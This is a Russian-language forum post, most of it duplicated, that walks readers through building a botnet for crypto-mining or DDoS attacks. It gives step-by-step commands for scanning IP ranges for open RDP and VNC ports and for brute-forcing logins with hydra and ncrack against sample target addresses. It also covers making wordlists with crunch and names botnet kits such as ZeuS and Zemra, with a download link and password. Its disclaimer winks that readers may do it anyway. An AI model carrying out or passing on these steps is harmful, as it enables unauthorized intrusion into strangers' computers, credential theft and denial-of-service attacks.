- 29
- 102
- 18 Май 2017
А сегодня мы соберём свой собственный ботнет, с помощью которого ты будешь майнить криптовалюту или устраивать DDoS-атаки.
Конечно же, статья написана только в целях обучения азам информационной безопасности, все что здесь сказано только для ознакомления, а ответственность за твои действия лежит только на тебе. И вообще, такое делать нельзя, ибо можно попасть в тюрьму. Но если очень сильно хочется, то можно : )
=================================
Для ботнета нам нужны:
1)ip компьютеров, серверов и т.д
2)брутфорс
3) программа для управления ботнетом
Для начала нам нужно найти компы для ботнета. Для проверяем диапазонв IP-адрессов на наличие в них компьютеров с открытыми портами 3389 или 5900 (сервисы RDP и VNC) . Можно использовать программы "Аdvanced IР Scanner", "VNC scanner" и т.д
Но где взять диапазоны IP?
Их можно найти на сайте Для просмотра ссылки Войдиили Зарегистрируйся, например. Вставляете название любого города или страны и копируете диапозон IP адресов в сканеры (Хак: если указать диапазон ip с постфтксом /4 (например, 92.168.0.0/4) то адресов будет ооочень много, чем меньше чем число после '/', тем больше диапазон).
Вот мы и получили ip уязвимых компов, теперь дело за малым: взломать их.
=================================
Сейчас скопируй все полученные тобой адреса в какой-нибудь файлик .txt и раздели все адреса так, чтобы новый адрес начинался с новой строки.
Взломать их можно программой hydra, с помощью которой можно получить логин и пароль путем брутфорса.
Установим hydra:
windows:
качаем Для просмотра ссылки Войдиили Зарегистрируйся
взламываем
Debian и Ubuntu:
# apt-get install hydra
Команда:
hydra -L logins.txt -P password.txt -M ip.txt -vV -o ~/hydra-good.txt rdp
Обьясняю:
hydra — Название программы
-L logins.txt — словарь логинов
-P password.txt — словарь паролей
-M ip.txt — список IP адресов с открытым портом 3389
-vV — Отображать лог в консоли
-o ~/hydra-good.txt — Куда записывать хорошие
rdp — Название протокола
Если вы получили только один ip то чекайте еще, но если именно его то:
hydra -L login.txt -P password.txt -vV -o ~/good.txt 22.25.35.43 rdp
проверит, лишь в 22.25.35.43:3389. В удачном случае запишет это в ~/good.txt
P.S.
hydra брутит:
asterisk cisco cisco-enable cvs firebird ftp ftps http-{head|get} http-{get|post}-form http-proxy http-proxy-urlenum icq imap irc ldap2 ldap3[-{cram|digest}md5] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3 postgres rdp rexec rlogin rsh sip smb smtp smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet vmauthd vnc xmp
=================================
Программа ncrack делает тоже самое, но как мне кажется, быстрее
Скачать можно с оф. Сайта Для просмотра ссылки Войдиили Зарегистрируйся
Для запуска под виндой( о да мы все ее любим) убедитесь, что Visual C++ Redist 13.0 и 14.0 установлен.
Чтобы установить в другие ОС
Установка под Debian (а также Ubuntu, Kali Linux и т.д):
1. Откройте терминал
2. Введите команду:
apt-get install ncrack
3. Подтвердите установку, нажав клавишу "Y".
В отличие от hydra, в ncrack есть уже встроенные словари. Те, что имеют расширение usr — это словари логинов, ну а pwd — паролей.
Теперь по порядку:
common.usr — Это очень сложные словари для крепких компов.
jtr.pwd — Это словарь паролей, которыми пользовались пользователи unix-подобных системы в середи 90-00ых.
default.pwd и default.usr — Это стандартные словари.
top50000.pwd — Большой словарь паролей для крепких компов.
jtr.pwd — Это словарь паролей, которыми пользовались пользователи unix-подобных системы в середи 90-ых.
minimal.usr — Это короткий словарь логинов. Для простых компов.
myspace.pwd — Это словарь паролей слитый с ресурса myspace.
phpbb.pwd — тоже, что и выше.
Команда:
ncrack -vv -U minimal.usr -P default.pwd 45.22.43.114:3389
Разбираем команду:
-vv — повышение производительности.
-U minimal.usr — словарь логинов из minimal.usr
-P default.pwd — пароли
45.22.43.114:3389 — указываем цель в виде IP
ORT. Ncrack понимает, что это — RDP.
Программа ломамает компы, а чтобы узнать, что сейчас происходит, просто нажмите два раза пробел. Как только один удачный результат, вы увидите что-то вроде такого:
45.22.43.114 3389/tcp rdp: "admin" "927426"
P.S.
Так же рограмма взламывает RDP, SSH, HTTP(S), SMB, POP3(S), VNC, FTP, SIP, Redis, PostgreSQL, MySQL, Telnet.
=================================
Если вы не можете найти нормальный словать, то можете сомтавить свой с помощью crunch(в kali эта программа уже встроена)
Если вам нужен словать из цифр от 1 до 8
Команда:
crunch 1 8 1234567890 -o ~/wordlist.txt
Разберем:
Crunch — название программы.
1 — мин. Число.
8 —макс. Число.
1234567890 — символы из которых составлять словарь.
-o —куда сохранять.
Если вам нужно словать из букв или букв и цифр ,то прописываете весь алфавит и цифры.
Ну вот теперь у нас есть и словарь)
=================================
Но что же теперь делать когда у нас есть уже взломанные компы?
Набор взломанных компов - это ещё не ботнет. Тебе нужно придумать, как управлять всеми компьютерами. Конечно, ты уже сейчас можешь заходить на каждый из взломанных компьютеров и отдавать ему команды. Потом следующему. И ещё. Но это долго. Для облегчения жизни существуют специальные программы для ботнетов, которые позволяют работать сразу со всеми компьютерами, или частью ботнета. Согласись, это гораздо удобнее. Вот некоторые такие программы:
1)Zemra Bot
Для просмотра ссылки Войдиили Зарегистрируйся!8CRXmRKC!nnoZIt5HfCG7x306CO5rAmBYdvuV1bz6EQDkvzaafEY пароль "Для просмотра ссылки Войди или Зарегистрируйся"
2)ZeuS
3)N0PE botnet
Конечно же, статья написана только в целях обучения азам информационной безопасности, все что здесь сказано только для ознакомления, а ответственность за твои действия лежит только на тебе. И вообще, такое делать нельзя, ибо можно попасть в тюрьму. Но если очень сильно хочется, то можно : )
=================================
Для ботнета нам нужны:
1)ip компьютеров, серверов и т.д
2)брутфорс
3) программа для управления ботнетом
Для начала нам нужно найти компы для ботнета. Для проверяем диапазонв IP-адрессов на наличие в них компьютеров с открытыми портами 3389 или 5900 (сервисы RDP и VNC) . Можно использовать программы "Аdvanced IР Scanner", "VNC scanner" и т.д
Но где взять диапазоны IP?
Их можно найти на сайте Для просмотра ссылки Войди
Вот мы и получили ip уязвимых компов, теперь дело за малым: взломать их.
=================================
Сейчас скопируй все полученные тобой адреса в какой-нибудь файлик .txt и раздели все адреса так, чтобы новый адрес начинался с новой строки.
Взломать их можно программой hydra, с помощью которой можно получить логин и пароль путем брутфорса.
Установим hydra:
windows:
качаем Для просмотра ссылки Войди
взламываем
Debian и Ubuntu:
# apt-get install hydra
Команда:
hydra -L logins.txt -P password.txt -M ip.txt -vV -o ~/hydra-good.txt rdp
Обьясняю:
hydra — Название программы
-L logins.txt — словарь логинов
-P password.txt — словарь паролей
-M ip.txt — список IP адресов с открытым портом 3389
-vV — Отображать лог в консоли
-o ~/hydra-good.txt — Куда записывать хорошие
rdp — Название протокола
Если вы получили только один ip то чекайте еще, но если именно его то:
hydra -L login.txt -P password.txt -vV -o ~/good.txt 22.25.35.43 rdp
проверит, лишь в 22.25.35.43:3389. В удачном случае запишет это в ~/good.txt
P.S.
hydra брутит:
asterisk cisco cisco-enable cvs firebird ftp ftps http-{head|get} http-{get|post}-form http-proxy http-proxy-urlenum icq imap irc ldap2 ldap3[-{cram|digest}md5] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3 postgres rdp rexec rlogin rsh sip smb smtp smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet vmauthd vnc xmp
=================================
Программа ncrack делает тоже самое, но как мне кажется, быстрее
Скачать можно с оф. Сайта Для просмотра ссылки Войди
Для запуска под виндой( о да мы все ее любим) убедитесь, что Visual C++ Redist 13.0 и 14.0 установлен.
Чтобы установить в другие ОС
Установка под Debian (а также Ubuntu, Kali Linux и т.д):
1. Откройте терминал
2. Введите команду:
apt-get install ncrack
3. Подтвердите установку, нажав клавишу "Y".
В отличие от hydra, в ncrack есть уже встроенные словари. Те, что имеют расширение usr — это словари логинов, ну а pwd — паролей.
Теперь по порядку:
common.usr — Это очень сложные словари для крепких компов.
jtr.pwd — Это словарь паролей, которыми пользовались пользователи unix-подобных системы в середи 90-00ых.
default.pwd и default.usr — Это стандартные словари.
top50000.pwd — Большой словарь паролей для крепких компов.
jtr.pwd — Это словарь паролей, которыми пользовались пользователи unix-подобных системы в середи 90-ых.
minimal.usr — Это короткий словарь логинов. Для простых компов.
myspace.pwd — Это словарь паролей слитый с ресурса myspace.
phpbb.pwd — тоже, что и выше.
Команда:
ncrack -vv -U minimal.usr -P default.pwd 45.22.43.114:3389
Разбираем команду:
-vv — повышение производительности.
-U minimal.usr — словарь логинов из minimal.usr
-P default.pwd — пароли
45.22.43.114:3389 — указываем цель в виде IP
ORT. Ncrack понимает, что это — RDP. Программа ломамает компы, а чтобы узнать, что сейчас происходит, просто нажмите два раза пробел. Как только один удачный результат, вы увидите что-то вроде такого:
45.22.43.114 3389/tcp rdp: "admin" "927426"
P.S.
Так же рограмма взламывает RDP, SSH, HTTP(S), SMB, POP3(S), VNC, FTP, SIP, Redis, PostgreSQL, MySQL, Telnet.
=================================
Если вы не можете найти нормальный словать, то можете сомтавить свой с помощью crunch(в kali эта программа уже встроена)
Если вам нужен словать из цифр от 1 до 8
Команда:
crunch 1 8 1234567890 -o ~/wordlist.txt
Разберем:
Crunch — название программы.
1 — мин. Число.
8 —макс. Число.
1234567890 — символы из которых составлять словарь.
-o —куда сохранять.
Если вам нужно словать из букв или букв и цифр ,то прописываете весь алфавит и цифры.
Ну вот теперь у нас есть и словарь)
=================================
Но что же теперь делать когда у нас есть уже взломанные компы?
Набор взломанных компов - это ещё не ботнет. Тебе нужно придумать, как управлять всеми компьютерами. Конечно, ты уже сейчас можешь заходить на каждый из взломанных компьютеров и отдавать ему команды. Потом следующему. И ещё. Но это долго. Для облегчения жизни существуют специальные программы для ботнетов, которые позволяют работать сразу со всеми компьютерами, или частью ботнета. Согласись, это гораздо удобнее. Вот некоторые такие программы:
1)Zemra Bot
Для просмотра ссылки Войди
2)ZeuS
3)N0PE botnet
Последнее редактирование:
